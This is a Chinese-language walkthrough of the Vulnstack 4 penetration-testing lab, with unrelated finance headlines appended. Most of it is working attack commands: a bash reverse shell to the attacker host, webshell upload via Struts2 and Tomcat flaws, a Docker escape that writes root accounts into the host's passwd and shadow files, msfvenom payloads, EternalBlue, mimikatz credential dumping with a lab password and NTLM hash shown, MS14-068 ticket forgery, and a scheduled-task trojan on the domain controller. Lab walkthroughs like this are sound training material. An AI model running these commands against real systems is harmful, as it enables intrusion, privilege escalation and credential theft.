红日(vulnstack)4 内网渗透ATTCK实战
创始人
2025-06-01 05:11:34

环境配置

靶机链接:百度网盘 请输入提取码

提取码:fk2z

WEB 192.168.111.132 192.168.54.133

WIN7 192.168.54.130

DC 192.168.54.132

网卡配置:

web靶机配置:

启动docker服务:

sudo docker start ec 17 09 bb da 3d ab ad

sudo docker ps

web渗透

1.探测web靶机开放端口和服务情况

nmap -p- -A -sV 192.168.111.132

2.查看2001端口,是一个struts2

3.查看2002端口是一个tomcat

4.2003端口是一个phpmyadmin界面

5.探测漏洞,似乎有cve-2017-5638

nikto -host http://192.168.111.132:2001

6.利用struts2工具进行探测,确实存在漏洞。

7.可以执行命令

8.进行反弹shell操作

bash -i >& /dev/tcp/192.168.111.129/8888 0>&1

9.进去之后虽然是root权限但是它是一个docker容器的权限!

docker容器判断方法:

1>判断根目录下 .dockerenv文件

2>查询系统进程的cgroup信息

ls -alh /.dockerenv

cat /proc/1/cgroup

Tomcat漏洞

1.2002端口存在Tomcat cve-2017-12615漏洞

把get请求改为post 上传冰蝎马

2.成功连接冰蝎,并且是Root权限

3.kali开启监听,进行反弹shell操作

利用特权模式进行 docker 逃逸

1.SHELL=bash script -q /dev/null //反弹交互式shell

fdisk -l //查看磁盘文件

cd /tmp

mkdir hak //创建目录以备挂载

mount /dev/sda1 hak //将宿主机/dev/sda1 目录挂载至容器内

cat hak/etc/passwd //可任意读取文件

2.写入特权账号,密码为ubuntu

echo "hak:x:0:0::/home/wanli:/bin/bash" >> hak/etc/passwd

echo "hak:\$1\$xJbww\$Yknw8dsfh25t02/g2fM9g/:18281:0:99999:7:::" >>hak/etc/shadow

3.写入的root权限用户无法登录ssh,写入普通用户,成功登录。

echo "wei:x:1001:1001:jack,,,:/home/jack:/bin/bash" >> hak/etc/passwd

echo "wei:\$1\$xJbww\$Yknw8dsfh25t02/g2fM9g/:18281:0:99999:7:::" >> hak/etc/shadow

横向渗透

1.本地开启http服务,将fscan下载到靶机里;

wget http://192.168.111.129:8000/fscan_amd64

./fscan -h 192.168.54.0/24 //开始扫描

2.生成木马,反弹到msf里进行渗透

msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=192.168.111.129 LPORT=8888 -f elf > shell.elf

use exploit/multi/handler

set payload linux/x86/meterpreter/reverse_tcp

set lhost 192.168.111.129

set lport 8888

run

3.代理选择ew或者frp,不建议msf自带的代理。

ew代理

在kali上执行命令

./ew_for_linux64 -s rcsocks -l 1188 -e 1234

在目标主机上上传ew_for_linux64

执行命令

./ew_for_linux64 -s rssocks -d 192.168.111.129 -e 1234

4.用代理启动msf ,利用永恒之蓝漏洞攻击win7

5.设置正向连接payload,多run几次才能拿到shell

set payload windows/x64/meterpreter/bind_tcp

win7渗透

1.load kiwi 加载猕猴桃

2.creds_all 列举所有凭据 ,列举系统中的明文密码

Username:douser PASSWORD:Dotest123

Domain:DEMO.COM

NTLM:bc23b0b4d5bf5ff42bc61fb62e13886e

SID:S-1-5-21-979886063-1111900045-1414766810-1107

3.因为靶机作者已经把利用工具已放到了桌面,切换到桌面目录,可以直接利用。

cd C:\Users\douser\Desktop

4.生成高权限票据

MS14-068.exe -u 域成员名@域名 -s 域成员sid -d 域控制器地址 -p 域成员密码

MS14-068.exe -u douser@DEMO.COM -s S-1-5-21-979886063-1111900045-1414766810-1107 -d 192.168.54.132 -p Dotest123

5.利用mimikatz导入票据

kerberos::purge //清空票据

kerberos::ptc TGT_douser@DEMO.COM.ccache //将票据注入到内存中

kerberos::list //查看票据

6.成功访问域控

dir \\计算机机器名字\c$

dir \\WIN-ENS2VR5TR3N\c$

7.生成正向木马,写入域控进行弹shell

msfvenom -p windows/meterpreter/bind_tcp LHOST=192.168.52.131 LPORT=7777 -f exe > 7777.exe

8.把本地生成的木马,上传到win7的c盘,然后复制到域控的c盘

upload /home/kali/Desktop/7777.exe C:\

copy C:\\7777.exe \\WIN-ENS2VR5TR3N\c$

9.创建计划任务,执行木马

schtasks /create /S WIN-ENS2VR5TR3N /tn yukong /sc onstart /tr c:\7777.exe /ru system /f

schtasks /run /s 192.168.52.132 /i /tn "yukong"

失败!!

相关内容

热门资讯

今日起招股发售价9.75港元,... 6月2日,车来了母公司元光科技启动全球发售,发售价9.75港元,预计将在6月10日在港交所挂牌。元光...
港股午评:恒生指数跌2.20%... 新京报贝壳财经讯 6月2日,港股午间收盘,恒生指数跌2.20%,恒生科技指数跌2.43%。石药集团跌...
夏乐:美债压力与美元走弱 全球... 原创 财联社 蜂网专家2025年05月29日《首席说》是财联社倾力打造的一档高端直播联线栏目。面向泛...
罗志恒:财政政策不应受3%赤字... 罗志恒系粤开证券首席经济学家、中国首席经济学家论坛理事自2008年以来,本轮积极财政政策实行了长达1...
三大利空,突袭! 三大利空,突... 时局依然不稳!今天早上,全球市场全线杀跌。日经指数一度杀跌近1.5%,中国台湾股指大跌近1%,港股三...
美国客户“疯狂”催单 这家川企... 自硬公司的精密零件产品之一:随钻用核心零部件。韩吉尔摄 “5月中旬,美国休斯敦的客户发邮件,要求尽快...
这只港股,突然暴涨超60%!发... 6月2日,亚太股市开盘后持续走弱。不过,港股方面,加密货币数字概念股大涨,连连数字涨62.67%。港...
招商基金三首席同日上任!“去管... 当同行纷纷为投研人才做“去管理化”减法时,招商基金却反其道而行之,提拔朱红裕、王景两位基金经理。这究...
2025浙江国际电子商务博览会... 这个周末,端午的粽叶飘香和六一小朋友的欢笑声撞了个满怀~跨境电商圈也跟着热闹到飞起。 从节令美食到文...
头部餐饮,火拼儿童餐 头部餐饮... 总第4234期作者 |餐饮老板内参内参君儿童餐,卷入next level端午恰逢六一,双节叠加背景下...
舆论战升级!巨子生物深夜回应,... 2025.06.02本文字数:2490,阅读时长大约4分钟作者 |第一财经 刘晓颖重组胶原蛋白成分之...
财经时评|以创新厚度重塑汽车产... 作者 远山中国汽车工业协会与工业和信息化部近期针对行业“内卷式”竞争的联合发声,为持续蔓延的价格战按...
恒生指数午盘下跌2.20%,恒... 6月2日午盘,香港恒生指数下跌2.20%,报22778.45点;恒生科技指数下跌2.43%,报504...
“以旧换新”带货1万亿,中国何... “美国想让制造业回流成为中国的样子,一个踏实劳作的‘生产者社会’;而中国想努力扩大消费成为美国的样子...
恒指半日跌2.2% 恒指半日跌... 【恒指半日跌2.2%】截至午间收盘,香港恒生指数下跌2.20%,报22778.45点;恒生科技指数下...
“成分之争”舆论战升级,巨子生... 重组胶原蛋白成分之争的舆论战再度升级。美妆博主 "大嘴博士" (郝宇)近日连续发文质疑,巨子生物(0...
汇川技术新注册《InoCube... 证券之星消息,近日汇川技术(300124)新注册了《InoCube-InoData数据分析系统V1....
博将控股多家所投企业荣登202... 博将控股多家所投企业荣登2025杭州独角兽与准独角兽榜单 2025年4月24日,由民建浙江省委会、浙...
刚刚,A50直线跳水!亚太股市... 6月2日,亚太股市开盘后持续走弱。富时中国A50期货开盘跌0.6%,截至目前跌幅1.91%。 截至...
问界、智界、享界、尊界,202... 2025鸿蒙智行:四界表现鸿蒙智行作为国内造车新势力的主流品牌,一共规划了“五界”车型,包括:问界、...
花样年控股:重组支持协议的最后... 6月1日,花样年控股(01777.HK)公告称,公司2024年4月29日所订立的重组支持协议的最终截...
蜜雪集团股价创上市以来新高 蜜... 新京报贝壳财经讯 6月2日,港股蜜雪集团盘中涨超7%,股价刷新上市新高。
美单边关税让全球经济面临更大不... 美国征收关税的对象和标准可能随意变更,其关税政策具有不可预测性。无论是外国企业,还是美国本土企业,都...
桃李面包创始人向其两儿子转让3... 5月30日晚间,桃李面包(沪市代码:603866)公告称,公司控股股东及实际控制人吴志刚通过大宗交易...
前4月东莞重大项目完成投资42... 本期看点:前4月东莞重大项目完成投资429.09亿元;长联科技募投项目提升年产至2.77万吨;广东省...
恒生指数跌幅扩大至2%,医药、... 6月2日,恒生指数跌幅扩大至2%,医药、地产、能源板块跌幅居前,美中嘉和跌超14%,石四药集团跌近1...
港股、A50飘绿,亚太市场多数... 早间,亚太市场多数下跌。港股、A50集体下跌其中,恒生指数、恒生科技指数开盘跌幅扩大, 港股生物技术...
雷军看好的两兄弟,要IPO了 ... 2021年夏,小米产业园办公室内,雷军饶有兴致地打量眼前一对兄弟,“为什么张波是创始人,董事长却是张...
圣阳股份涨1.66%,成交额9... 5月30日,圣阳股份涨1.66%,成交额9.82亿元,换手率15.03%,总市值66.67亿元。 异...